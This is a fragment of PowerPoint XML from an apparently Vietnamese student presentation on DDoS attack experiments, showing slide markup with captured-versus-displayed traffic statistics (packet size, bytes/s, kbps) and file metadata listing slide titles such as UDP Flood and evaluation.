            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Kích thước gói tin trung bình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Thu thập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: 54 byte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Hiển thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: 54 byte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Trung bình byte/s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Thu thập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: 6,814 byte/giây.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Hiển thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: 6,901 byte/giây.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Trung bình bits/s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Thu thập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: 54 kbps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Hiển thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: 55 kbps.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1214678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545</TotalTime>
  <Words>2535</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>190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Nghiên cứu thực nghiệm tấn công mạng DDOS</vt:lpstr>
      <vt:lpstr>Bước chuẩn bị:</vt:lpstr>
      <vt:lpstr>Mục tiêu:</vt:lpstr>
      <vt:lpstr>Vấn đề:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Kết thúc:</vt:lpstr>
      <vt:lpstr>Kiểu tấn công ddos UDP Flood (thuộc tầng ):</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Đánh giá:</vt:lpstr>
      <vt:lpstr>Đánh giá:</vt:lpstr>
      <vt:lpstr>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khoa học tấn công DDOS</dc:title>
  <dc:creator>trung nguyen</dc:creator>
  <cp:lastModifiedBy>trung nguyen</cp:lastModifiedBy>
  <cp:revision>76</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-15T11:21:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-17T17:27:28Z</dcterms:modified>
</cp:coreProperties>
</file>